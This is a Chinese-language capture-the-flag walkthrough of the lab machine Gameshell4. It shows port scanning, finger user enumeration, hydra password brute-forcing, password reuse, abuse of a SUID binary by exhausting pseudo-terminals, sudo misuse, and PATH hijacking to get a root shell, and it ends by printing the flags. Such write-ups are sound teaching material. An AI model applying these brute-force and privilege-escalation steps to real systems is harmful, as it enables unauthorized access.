Mazesec_Gameshell4

靶机来源：QQ群-660930334

难度：Easy

一、信息收集

1、主机探测

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-17 09:01 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00023s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00026s latency).
MAC Address: 08:00:27:8D:05:1E (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.88
Host is up (0.00040s latency).
MAC Address: 08:00:27:96:24:6F (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.48 seconds

靶机IP：192.168.2.88

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.88                   
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-17 09:01 +0800
Nmap scan report for 192.168.2.88
Host is up (0.00047s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
79/tcp open  finger
80/tcp open  http
MAC Address: 08:00:27:96:24:6F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.26 seconds

开放端口：22、79、80

2.详细信息扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,79,80 192.168.2.88
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-17 09:02 +0800
Nmap scan report for 192.168.2.88
Host is up (0.00100s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
79/tcp open  finger  OpenBSD fingerd (ported to Linux)
| finger: \x0D
| Welcome to Linux version 4.19.0-27-amd64 at GameShell4 !\x0D
| 
|  21:03:09 up 4 min,  0 users,  load average: 0.01, 0.08, 0.04
| \x0D
|_No one logged on.\x0D
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Hidden Server
MAC Address: 08:00:27:96:24:6F (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: Host: GameShell4; OSs: Linux, Linux 4.19.0-27-amd64; CPE: cpe:/o:linux:linux_kernel, cpe:/o:linux:linux_kernel:4.19.0-27-amd64

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.19 seconds

3.udp扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.88                       
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-17 09:03 +0800
Nmap scan report for 192.168.2.88
Host is up (0.0013s latency).
All 100 scanned ports on 192.168.2.88 are in ignored states.
Not shown: 59 closed udp ports (port-unreach), 41 open|filtered udp ports (no-response)
MAC Address: 08:00:27:96:24:6F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 59.27 seconds

二、WEB渗透

1、80端口

访问80端口

2、目录扫描

┌──(root㉿kali)-[~/miaosec]
└─# gobuster dir -u http://192.168.2.88 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,bak
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.88
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8.2
[+] Extensions:              js,txt,bak,php,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index.html           (Status: 200) [Size: 5431]
sudoku               (Status: 401) [Size: 459]
server-status        (Status: 403) [Size: 277]

找到一个sudoku，访问需要账号和密码

三、Finger用户枚举

finger用户枚举工具：https://github.com/dev-angelist/Finger-User-Enumeration# 需要对代码进行修改：

def check_valid_user(output):
    """Function to check if the user is valid by analyzing the output."""
    if "no such user." in output:
	    return False
	else:
		return True
    
    #if "Login" in output and "Name" in output and "Super-User" in output:
    #    return True
    #if "ssh" in output:
    #    return True
    #return False

对finger用户进行枚举

┌──(root㉿kali)-[~/miaosec]
└─# python3 finger_user_enumeration.py -t 192.168.2.88 -w ../Tool/techyou.txt

[+] User found: admin@192.168.2.25

[!] 1 Users Found

查看返回的信息，确定最终的用户为admin

┌──(root㉿kali)-[~/miaosec]
└─# finger admin@192.168.2.88

Welcome to Linux version 4.19.0-27-amd64 at GameShell4 !

 21:33:27 up 34 min,  0 users,  load average: 0.75, 3.20, 2.60

Login: admin                            Name: 
Directory: /home/admin                  Shell: /bin/bash
Never logged in.
No mail.
No Plan.

四、HTTP认证服务爆破

使用hydra进行爆破

┌──(root㉿kali)-[~/miaosec]
└─# hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.2.88 http-get /sudoku
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-03-17 10:33:03
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-get://192.168.2.88:80/sudoku
[STATUS] 7659.00 tries/min, 7659 tries in 00:01h, 14336740 to do in 31:12h, 16 active
[STATUS] 7626.00 tries/min, 22878 tries in 00:03h, 14321521 to do in 31:18h, 16 active
[STATUS] 7585.29 tries/min, 53097 tries in 00:07h, 14291302 to do in 31:25h, 16 active
[80][http-get] host: 192.168.2.88   login: admin   password: babylove3
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-03-17 10:42:02

使用凭证进入到界面，发现是一个数独游戏，那就解一下

解出后获取到一串字符串：SUDOKUISMAGIC

五、获取admin权限

使用获取到的凭证admin:babylove3成功获取到shell

┌──(root㉿kali)-[~/miaosec]
└─# ssh admin@192.168.2.88     
admin@GameShell4:~$ id
uid=1004(admin) gid=1004(admin) groups=1004(admin)

六、权限提升

1、获取xcm权限

查看/home目录，发现存在其余两个用户

admin@GameShell4:~$ ls -la /home
total 20
drwxr-xr-x  5 root  root  4096 Dec  1 07:42 .
drwxr-xr-x 18 root  root  4096 Mar 18  2025 ..
drwx------  2 admin admin 4096 Dec  1 08:13 admin
drwx------  2 sdk   sdk   4096 Dec  1 08:13 sdk
drwx------  2 xcm   xcm   4096 Dec  3 08:25 xcm

经过测试发现，使用密码sudokuismagic能成功切换到xcm用户

admin@GameShell4:~$ su xcm
Password: sudokuismagic
xcm@GameShell4:/home/admin$ id
uid=1003(xcm) gid=1003(xcm) groups=1003(xcm)

2、获取sdk权限

查看sudo -l

xcm@GameShell4:/$ sudo -l
Matching Defaults entries for xcm on GameShell4:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/usr/games

User xcm may run the following commands on GameShell4:
    (sdk) NOPASSWD: /usr/local/bin/uv init *, /usr/local/bin/uv help *

查看suid文件

xcm@GameShell4:/$ find / -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
/opt/revive

发现/opt/revive具有suid权限

查看文件

xcm@GameShell4:/$ strings /opt/revive 
/lib64/ld-linux-x86-64.so.2
setuid
exit
fopen
unlink
chmod
fgets
strstr
fputc
fputs
fclose
stderr
fwrite
rename
geteuid
fprintf
__cxa_finalize
__libc_start_main
....

主要功能是：检测是否存在 /dev/pts/99，如果存在，则修改 /etc/passwd，将用户 sdk 的 shell 从 /usr/games/cbonsai 改为 /bin/bash，从而获得交互式 shell

伪造一个/dev/pts/99

xcm@GameShell4:/tmp$ mkdir -p /tmp/holdptys
xcm@GameShell4:/tmp$ for i in $(seq 1 110); do python3 -c 'import os,pty,time; m,s=pty.openpty(); print(os.ttyname(s)); time.sleep(600)'>/tmp/holdptys/$i.out 2>/tmp/holdptys/$i.err & done

成功进行修改

xcm@GameShell4:/$ /opt/revive 
[+] /dev/pts/99 found! Updating sdk shell...
[+] Success! sdk shell updated to /bin/bash

进行提权

xcm@GameShell4:/$ sudo -u sdk  /usr/local/bin/uv help help
sdk@GameShell4:/$ id
uid=1002(sdk) gid=1002(sdk) groups=1002(sdk)

3、获取root权限

查看sudo -l

sdk@GameShell4:/$ sudo -l
Matching Defaults entries for sdk on GameShell4:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/usr/games

User sdk may run the following commands on GameShell4:
    (ALL) NOPASSWD: /usr/local/bin/livescreen

查看文件livescreen内容

sdk@GameShell4:/$ strings /usr/local/bin/livescreen
#!/bin/bash
cbonsai -i -l

查看cbonsai的路径和PATH环境

sdk@GameShell4:/$ which cbonsai
/usr/games/cbonsai

sdk@GameShell4:/$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/games

同时发现/usr/local/bin可写

sdk@GameShell4:/$ ls -ld /usr/local/bin
drwxrwxr-x+ 2 root root 4096 Dec  2 08:29 /usr/local/bin

直接PATH劫持

sdk@GameShell4:/$ echo '/bin/bash -p' > /usr/local/bin/cbonsai
sdk@GameShell4:/$ chmod +x /usr/local/bin/cbonsai

成功获取到root权限

sdk@GameShell4:/$ sudo /usr/local/bin/livescreen
root@GameShell4:/# id
uid=0(root) gid=0(root) groups=0(root)

七、查看FLAG

root@GameShell4:/# cat /root/root.txt /home/xcm/user.txt 
flag{root-983b0f2b5412aadd94ed08f249355686}
flag{user-602d9cd809f3b29eae8bc042bdf6c1ca}